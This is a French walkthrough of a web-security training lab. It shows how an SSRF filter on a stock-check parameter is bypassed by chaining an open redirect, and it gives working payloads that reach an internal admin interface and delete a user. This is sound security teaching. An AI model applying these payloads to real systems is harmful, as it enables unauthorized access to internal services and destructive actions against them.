Bypass SSRF via redirection ouverte

SSRF with filter bypass via open redirection vulnerability

Lab: SSRF with filter bypass via open redirection vulnerability | Web Security AcademyWebSecAcademy

Ce laboratoire utilise une fonctionnalité de vérification de stock qui récupère des données depuis un système interne. L’objectif consiste à modifier l’URL utilisée par le stock checker pour atteindre l’interface d’administration située sur : http://192.168.0.12:8080/admin Puis supprimer l’utilisateur carlos.

Le filtre côté serveur n’autorise que les URL internes à l’application, ce qui oblige à exploiter une vulnérabilité de redirection ouverte.

Analyse

Le paramètre contrôlé est :

stockApi=/product/stock/check?productId=1%26storeId=1

Si l’on tente directement :

stockApi=http://192.168.0.12:8080/admin

le serveur renvoie Invalid external stock check URL 'Invalid URL' : les requêtes externes sont bloquées.

Cependant, l’application comporte une fonctionnalité nextProduct, vulnerable à une redirection ouverte via le paramètre path :

https://0adc006f044883d082847e1d00a500b3.web-security-academy.net/product/nextProduct?currentProductId=1&path=/product?productId=2

Cette fonctionnalité permet de forcer le serveur à suivre une URL arbitraire vers laquelle il redirige.

Exploitation

On utilise donc le redirecteur interne comme relais vers le système interne :

stockApi=/product/nextProduct?currentProductId=1%26path=http://192.168.0.12:8080/admin

Une fois l’accès à l’interface admin obtenu via cette redirection, on supprime l’utilisateur carlos :

stockApi=/product/nextProduct?currentProductId=1%26path=http://192.168.0.12:8080/admin/delete?username=carlos

Mis à jour il y a 25 jours

Ce contenu vous a-t-il été utile ?